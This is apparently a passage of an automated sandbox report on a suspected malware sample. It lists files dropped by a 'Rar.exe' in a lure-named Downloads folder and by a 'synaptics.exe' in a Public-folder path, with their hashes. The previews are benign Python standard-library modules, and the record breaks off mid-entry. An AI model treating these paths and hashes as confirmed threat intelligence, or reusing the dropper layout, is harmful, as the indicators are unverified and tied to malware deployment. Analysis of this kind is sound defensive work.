                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF, CR line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):79885
                                                                                                                                                                                      Entropy (8bit):4.366884409318954
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:KPRttodRiVJ8forhoJiVz3Pu8h+H6IVy7tWYsvqkYV+dOPzwlorNpdADdNZn8VF6:KPRtX9oiukigJsOYZFhr9pUT9FW
                                                                                                                                                                                      MD5:374B0F166F2FC787BC59D71555F62378
                                                                                                                                                                                      SHA1:6DE0DFD89E9F8AAA4E76B3BFED821B3C9C444584
                                                                                                                                                                                      SHA-256:91C791F7C41C23A8C64026A92AB276DE5D3F2F0661430D44596054F40CFFC66B
                                                                                                                                                                                      SHA-512:466A74BEC12122E90708B6118B948D9DC1E33187212E6065FC81AFB004704F68DB03B5EFF2A2294179507D36A7ECDA6B41BDA4EAF9BF07E1B0B29A7A9842FD31
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Locale support module.....The module provides low-level access to the C lib's locale APIs and adds high..level number formatting APIs as well as a locale aliasing engine to complement..these.....The aliasing engine includes support for many commonly used locale names and..maps them to values suitable for passing to the C lib's setlocale() function. It..also includes default encodings for all supported locale names....."""....import sys..import encodings..import encodings.aliases..import re..import _collections_abc..from builtins import str as _builtin_str..import functools....# Try importing the _locale module...#..# If this fails, fall back on a basic 'C' locale emulation.....# Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before..# trying the import. So __all__ is also fiddled at the end of the file...__all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error",.. "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm",..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):82493
                                                                                                                                                                                      Entropy (8bit):4.535333444845991
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:TTM4A0scEBFwpxWJvH1LHaCAUSxV37kbGQR6+KVQhb:TTM4V/oNH17aykVLM0qJ
                                                                                                                                                                                      MD5:B8A10CBEDFF425920DC05A5038BA5723
                                                                                                                                                                                      SHA1:D7963C9958397B1AE8377AB8D17A8652CDDE5702
                                                                                                                                                                                      SHA-256:613C94FD78D5C40972F0E6A829C1BAAAA7496B3DE641200FC84970F89DAAA494
                                                                                                                                                                                      SHA-512:CBE3646C50B69A9359BE431BB583E201F02CD850AA7EFFD3AAE1FB190907DBAC63BC43F56805F1D95A90914BAF8828FADEEA4B439860C624514FCAF1AC96B4D6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66904
                                                                                                                                                                                      Entropy (8bit):5.226956492681782
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:pdNUC9zPGlE+L/8P4CcmsaS+rtz8lEp6wQh++5+VCKlv+g7tXcEOokQ02BbB:pdyg7e/8P4pmRSe58a6+rIZWLVxB
                                                                                                                                                                                      MD5:0538AA51A3A59B835DD42359EF7DCB39
                                                                                                                                                                                      SHA1:568EAFA9366D619DC8FC502C55A6D2261D078B49
                                                                                                                                                                                      SHA-256:C3BCF961B309143490391DC8DB37EDA8A72257A3E8797A9034AFB9ABD6739E4E
                                                                                                                                                                                      SHA-512:C383AF4018E8A0BE94897507A72E8743E76C3F1488041D2A9F402BD162A3A37B5DEE6AD694343AC570B669AF96A093207159C3755932E5ED0243000AE695DF39
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37442
                                                                                                                                                                                      Entropy (8bit):4.3193858074775155
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:TTOLQcVmMtVTFx4mDAlisUCH7vZM242+xuGYV:TTOLpxtVz4mDAlisUCH7u242+A3V
                                                                                                                                                                                      MD5:D404523DA4E85E6C5D23BA7F4CEC734F
                                                                                                                                                                                      SHA1:EA99F93A2C9A4490FF834675455DDC9A3B1A8644
                                                                                                                                                                                      SHA-256:CD1E433C7D3C56ABFA6197A3375F2AD435C030D2576437D6331EABA2256C5C86
                                                                                                                                                                                      SHA-512:78DEF3DF3ADC8435981BC4A2CD2D44441DE5FC62D566DD774EC48D94A04347E70227B1857CD27D0857B903776A241EB43BD218588D54267A23CC9BB01147F33D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):63003
                                                                                                                                                                                      Entropy (8bit):4.426667243960486
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:yTAqnmKu/EaGYhxVRkXAHq94TB+nbGsbDDL2eLRBoljlZ:yTF7uS4xHkp1nbGsbDDL2cRBolH
                                                                                                                                                                                      MD5:2B773B05650F410892A2CE9FE7516285
                                                                                                                                                                                      SHA1:F739153F9C119A7671414CCFBEE9B761256563BC
                                                                                                                                                                                      SHA-256:B70B1BE031F587D55D836E1E49995CA266487FE27F52B3F6FD4F9D7A8DEB48DD
                                                                                                                                                                                      SHA-512:12608454D0CAA866D7DAFBFCFEFF11A07AACF103C4D0326A51F90C0157BB9E17B3AC2BA4F55590C3EF6249C367326A8A386021EF178A079D34F57591C58DF6CA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13633
                                                                                                                                                                                      Entropy (8bit):4.6079115173576595
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:1aniQNwG7fMpo6Yx6ip/qkFQ1bN54ga15DPi7kMP4:Ki2N62QN+xMw
                                                                                                                                                                                      MD5:FACB9DDF63AA1A9A7BDA31E8B5D5D227
                                                                                                                                                                                      SHA1:26387A733267073DE41848DAF103582DBCED3AB6
                                                                                                                                                                                      SHA-256:DA46FA7C6C554A0705CF9A7318279B56FD5F62F71A55AC28E9579616F11129D6
                                                                                                                                                                                      SHA-512:E26E99D48775E2C3135DEF115F0B05550E5FEF1C0B9FD6178799E339A9F92F3FA05262E81C160B822F4D676763213D5252BC365F76571947F7AF386C1E0CB90D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Interface to the liblzma compression library.....This module provides a class for reading and writing compressed files,..classes for incremental (de)compression, and convenience functions for..one-shot (de)compression.....These classes and functions support both the XZ and legacy LZMA..container formats, as well as raw compressed data streams..."""....__all__ = [.. "CHECK_NONE", "CHECK_CRC32", "CHECK_CRC64", "CHECK_SHA256",.. "CHECK_ID_MAX", "CHECK_UNKNOWN",.. "FILTER_LZMA1", "FILTER_LZMA2", "FILTER_DELTA", "FILTER_X86", "FILTER_IA64",.. "FILTER_ARM", "FILTER_ARMTHUMB", "FILTER_POWERPC", "FILTER_SPARC",.. "FORMAT_AUTO", "FORMAT_XZ", "FORMAT_ALONE", "FORMAT_RAW",.. "MF_HC3", "MF_HC4", "MF_BT2", "MF_BT3", "MF_BT4",.. "MODE_FAST", "MODE_NORMAL", "PRESET_DEFAULT", "PRESET_EXTREME",.... "LZMACompressor", "LZMADecompressor", "LZMAFile", "LZMAError",.. "open", "compress", "decompress", "is_check_supported",..]....import builtins..import io..import os..from _lzma
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):80945
                                                                                                                                                                                      Entropy (8bit):4.32888996076859
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:inRVh+YxnKyQE4XXH7R7roIfNJMVNMTGDSSoQvV/RzqDSsz/WJ:gRnlxnKyQEAbxrvJMVNMTSrdJz7sz/WJ
                                                                                                                                                                                      MD5:6F58186862F4DD316370EB2426974AD8
                                                                                                                                                                                      SHA1:1271E30BB63D4B3C7D79619A0E00C8740B76C1AF
                                                                                                                                                                                      SHA-256:1D5A2E2D2AA10962128083F200C3188B57543F80B6D9FADA3E0DB2BD3B4A8265
                                                                                                                                                                                      SHA-512:7E1B520ED42DCEC7ACC50E8FE5E975F3E2FEF3D05172A680CA1CF1ADC1AF988F414635C66CFCE5ADEDA395F442A7E9EDC7EA0B27021943FE45788797468926CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Read/write support for Maildir, mbox, MH, Babyl, and MMDF mailboxes."""....# Notes for authors of new mailbox subclasses:..#..# Remember to fsync() changes to disk before closing a modified file..# or returning from a flush() method. See functions _sync_flush() and..# _sync_close().....import os..import time..import calendar..import socket..import errno..import copy..import warnings..import email..import email.message..import email.generator..import io..import contextlib..from types import Generiuseras..try:.. import fcntl..except ImportError:.. fcntl = None....__all__ = ['Mailbox', 'Maildir', 'mbox', 'MH', 'Babyl', 'MMDF',.. 'Message', 'MaildirMessage', 'mboxMessage', 'MHMessage',.. 'BabylMessage', 'MMDFMessage', 'Error', 'NoSuchMailboxError',.. 'NotEmptyError', 'ExternalClashError', 'FormatError']....linesep = os.linesep.encode('ascii')....class Mailbox:.. """A group of messages in a particular place.""".... def __init__(self, path, facto
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9414
                                                                                                                                                                                      Entropy (8bit):4.388993591955687
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Qld55VGNyMNKjLmlUk0qwNfpyBO6WBL2gbL9lWj+R/IDHMZYtfH6CzgEYLARQz:QldD7NflLd+j+RgDQA/6CsEYLARk
                                                                                                                                                                                      MD5:5AA1FF0721FBA0760844039BB6B611B0
                                                                                                                                                                                      SHA1:58A18A636D5B05BAAAAB72395B18ACF0800D8722
                                                                                                                                                                                      SHA-256:E6E4C40533E07A294F7086F899005E03928EDE44CA5F9E532E47413147162E72
                                                                                                                                                                                      SHA-512:204E569BE5A222B37A513F1C6430DEE0598486B3339CDDCA32BD72499564E58796CD9E4666E5509E4AD52FE4404F64601549F9AECD297004B1FFAD41D17EE3FB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Mailcap file handling. See RFC 1524."""....import os..import warnings..import re....__all__ = ["getcaps","findmatch"]......def lineno_sort_key(entry):.. # Sort in ascending order, with unspecified entries at the end.. if 'lineno' in entry:.. return 0, entry['lineno'].. else:.. return 1, 0...._find_unsafe = re.compile(r'[^\xa1-\U0010FFFF\w@+=:,./-]').search....class UnsafeMailcapInput(Warning):.. """Warning raised when refusing unsafe input"""......# Part 1: top-level interface.....def getcaps():.. """Return a dictionary containing the mailcap database..... The dictionary maps a MIME type (in all lowercase, e.g. 'text/plain').. to a list of dictionaries corresponding to mailcap entries. The list.. collects all the entries for that MIME type from all available mailcap.. files. Each dictionary contains key-value pairs for that MIME type,.. where the viewing command is stored with the key "view"..... """.. caps = {}.. lineno = 0..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23180
                                                                                                                                                                                      Entropy (8bit):4.463605733550332
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NdY3Vj3p7PEvA4bNqC+3c0t18PctlG8yklR5clRVSalR5lR1PIHmTnmMd0xVI/WH:Nid3pUA4jI1Q8yI2Vd5pIB74WEQVMe9b
                                                                                                                                                                                      MD5:19FD48570E012C57FDB02C096AF8FD97
                                                                                                                                                                                      SHA1:E5DCF9298B01E38FAF310FE4FBAFD9AB66E78B4A
                                                                                                                                                                                      SHA-256:FF9E8DDA5C86DF9278D9054689EC16221009420C1282EE3DB5268621F1F61184
                                                                                                                                                                                      SHA-512:527767F7DA3A22FE01F1B25AB26FE269BA9213C643EFBCD0E1B94FB3A710BE7D2B578171D23DB18CD69F9183A4BCF2235A0B9AF64FE92EC1495D04954EEE8F0A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Guess the MIME type of a file.....This module defines two useful functions:....guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.....guess_extension(type, strict=True) -- guess the extension for a given MIME type.....It also contains the following, for tuning the behavior:....Data:....knownfiles -- list of files to parse..inited -- flag set when init() has been called..suffix_map -- dictionary mapping suffixes to suffixes..encodings_map -- dictionary mapping suffixes to encodings..types_map -- dictionary mapping suffixes to types....Functions:....init([files]) -- parse a list of files, default knownfiles (on Windows, the.. default values are taken from the registry)..read_mime_types(file) -- parse one file, return a dictionary or None.."""....import os..import sys..import posixpath..import urllib.parse....try:.. from _winapi import _mimetypes_read_windows_registry..except ImportError:.. _mimetypes_read_windows_registry = None....try:.. import winreg
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25086
                                                                                                                                                                                      Entropy (8bit):4.356741564526823
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:KXf/9NmEvuo6xaWHV2EuKPZ5QdTl+pdEupOsP02pgbK+6WP6dY9n/CLP:UvcPaWHV21KeTl+pd1pOsM2SGgP6dY9c
                                                                                                                                                                                      MD5:D696D103E7E451FFED860940CD1B06EA
                                                                                                                                                                                      SHA1:DC0C9ABE84D6C0E952025F7F399BAF7F5461D99C
                                                                                                                                                                                      SHA-256:92C6A7B834F56549F389C9C9924C29CDF6B2BDA10B43629B0F288C6F1B55C008
                                                                                                                                                                                      SHA-512:E50232665631652810DA4187427B25E111E12C3216D1A9646F50E4EBCF1613748E6A24F5501204FBDC4BA00DF1EF0EE4D0E2E951C26CC1CB37784E802C437BEC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Find modules used by a script, using introspection."""....import dis..import importlib._bootstrap_external..import importlib.machinery..import marshal..import os..import io..import sys......LOAD_CONST = dis.opmap['LOAD_CONST']..IMPORT_NAME = dis.opmap['IMPORT_NAME']..STORE_NAME = dis.opmap['STORE_NAME']..STORE_GLOBAL = dis.opmap['STORE_GLOBAL']..STORE_OPS = STORE_NAME, STORE_GLOBAL..EXTENDED_ARG = dis.EXTENDED_ARG....# Old imp constants:...._SEARCH_ERROR = 0.._PY_SOURCE = 1.._PY_COMPILED = 2.._C_EXTENSION = 3.._PKG_DIRECTORY = 5.._C_BUILTIN = 6.._PY_FROZEN = 7....# Modulefinder does a good job at simulating Python's, but it can not..# handle __path__ modifications packages make at runtime. Therefore there..# is a mechanism whereby you can register extra paths in this map for a..# package, and it will be honored.....# Note this is a mapping is lists of paths...packagePathMap = {}....# A Public interface..def AddPackagePath(packagename, path):.. packagePathMap.setdefault(packagena
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5890
                                                                                                                                                                                      Entropy (8bit):3.96552069041763
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:D94/ctpvs4RG9Q9TEHV0PhzqDGTfSLIOIqGf:D97Xvs4RGW9IHV2h2DGzSLIbf
                                                                                                                                                                                      MD5:C58FE7C3FE3A0411A80C2969CC3D984F
                                                                                                                                                                                      SHA1:9C23179052BFB6BBE11FE64A841F7105D3F422C7
                                                                                                                                                                                      SHA-256:F25C823F35566AC08A0A16D965A2D73685A29328976E27A7B95F2EE5E90491F2
                                                                                                                                                                                      SHA-512:A4624912B0BF87071437A46CE935FB991A9696D7979AE5603004ABD4ACC0917089893FAAEE2A8648B7F63A221C5DEB6B425881A9B6043126DD647948912A9487
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""An object-oriented interface to .netrc files."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998....import os, shlex, stat....__all__ = ["netrc", "NetrcParseError"]......class NetrcParseError(Exception):.. """Exception raised on syntax errors in the .netrc file.""".. def __init__(self, msg, filename=None, lineno=None):.. self.filename = filename.. self.lineno = lineno.. self.msg = msg.. Exception.__init__(self, msg).... def __str__(self):.. return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)......class netrc:.. def __init__(self, file=None):.. default_netrc = file is None.. if file is None:.. file = os.path.join(os.path.expanduser("~"), ".netrc").. self.hosts = {}.. self.macros = {}.. try:.. with open(file, encoding="utf-8") as fp:.. self._parse(file, fp, default_netrc).. except UnicodeDecodeError:.. with open(file, enc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42113
                                                                                                                                                                                      Entropy (8bit):4.583525592980188
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:qPzJzOekTQNd2n1/xwEtyvLrQiIVnt7P+QVE:wzJOnGo1pzsa1PRO
                                                                                                                                                                                      MD5:4D192F40E33C404168DDF0E1C27660AC
                                                                                                                                                                                      SHA1:CB959A526E74C36557F164BE65E365CC9E305909
                                                                                                                                                                                      SHA-256:5AE0C8F0379E3905D5A7A7DE6716C4B48DD7638D02870AFC7C5542231DE2E001
                                                                                                                                                                                      SHA-512:D44DEF654244C7B0A61114DD8F78363A971B10193B6C009D726002A636D1D0535263373F11117183729DE80D8D2C48134E1740CC2589B3B056BA0B272DBF7BF1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""An NNTP client class based on:..- RFC 977: Network News Transfer Protocol..- RFC 2980: Common NNTP Extensions..- RFC 3977: Network News Transfer Protocol (version 2)....Example:....>>> from nntplib import NNTP..>>> s = NNTP('news')..>>> resp, count, first, last, name = s.group('comp.lang.python')..>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)..Group comp.lang.python has 51 articles, range 5770 to 5821..>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))..>>> resp = s.quit()..>>>....Here 'resp' is the server response line...Error responses are turned into exceptions.....To post an article from a file:..>>> f = open(filename, 'rb') # file containing article, including header..>>> resp = s.post(f)..>>>....For descriptions of all methods, read the comments in the code below...Note that all arguments and return values representing article numbers..are strings, not numbers, since they are rarely used for calculations..."""....# RFC 977 by Brian
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30319
                                                                                                                                                                                      Entropy (8bit):4.519975623661739
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:oLxZcGnP1MszeSgz6CcuKky5TGjg8BNRKUa:s/3tCXzCuKky5L8vRKf
                                                                                                                                                                                      MD5:7D31906AFDC5E38F5F63BFEEB41E2EF2
                                                                                                                                                                                      SHA1:BBEFD95B28BAC9E58E1F1201AE2B39BBE9C17E5F
                                                                                                                                                                                      SHA-256:E34494AF36D8B596C98759453262D2778A893DAA766F96E1BB1EF89D8B387812
                                                                                                                                                                                      SHA-512:641B6B2171BB9AAE3603BE2CBCC7DD7D45968AFEB7E0A9D65C914981957BA51B2A1B7D4D9C6AEC88CF92863844761ACCDECA62DB62A13D2BC979E5279D7F87A0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Module 'ntpath' -- common operations on WinNT/Win95 pathnames.."""Common pathname manipulations, WindowsNT/95 version.....Instead of importing this module directly, import os and refer to this..module as os.path..."""....# strings representing various path-related bits and pieces..# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '\\'..pathsep = ';'..altsep = '/'..defpath = '.;C:\\bin'..devnull = 'nul'....import os..import sys..import stat..import genericpath..from genericpath import *......__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename","dirname","commonprefix","getsize","getmtime",.. "getatime","getctime", "islink","exists","lexists","isdir","isfile",.. "ismount", "expanduser","expandvars","normpath","abspath",.. "curdir","pardir","sep","pathsep","defpath","altsep",.. "
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2968
                                                                                                                                                                                      Entropy (8bit):4.64153878996554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:+W5wriD8gp26M8OjPZwZj33dyEUfIkiQ1J+4oEL8MyqBlJQGn7Iqaqy:+We2D3HM8OjPaDefIp74eMyqh+2y
                                                                                                                                                                                      MD5:1E561E1AD3FE73F57D902D66C695658A
                                                                                                                                                                                      SHA1:3DD20BA70AEC9AB04A3E69E17D0A2B10ECB43BC6
                                                                                                                                                                                      SHA-256:AD86C5B0A9D8F82E9129900F69765AD079CBEF670CCFD0B463FBF608E79224AD
                                                                                                                                                                                      SHA-512:B8E8AB92A11C66FE1A0D40C15F4D1071772EF1B0FBFE8F2A25793F6BD9704BC6BB6103E9FD619874774581E67C02D99D5143DCD6678E69F9C10EC7A3E20086B0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Convert a NT pathname to a file URL and vice versa.....This module only exists to provide OS-specific code..for urllib.requests, thus do not use directly..."""..# Testing is done through test_urllib.....def url2pathname(url):.. """OS-specific conversion from a relative URL of the 'file' scheme.. to a file system path; not recommended for general use.""".. # e.g... # ///C|/foo/bar/spam.foo.. # and.. # ///C:/foo/bar/spam.foo.. # become.. # C:\foo\bar\spam.foo.. import string, urllib.parse.. # Windows itself uses ":" even in URLs... url = url.replace(':', '|').. if not '|' in url:.. # No drive specifier, just convert slashes.. if url[:4] == '////':.. # path is something like ////host/path/on/remote/host.. # convert this to \\host\path\on\remote\host.. # (notice halving of slashes at the start of the path).. url = url[2:].. components = url.split('/').. # make sure not to co
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10741
                                                                                                                                                                                      Entropy (8bit):4.539923490195961
                                                                                                                                                                                      Encrypted:false
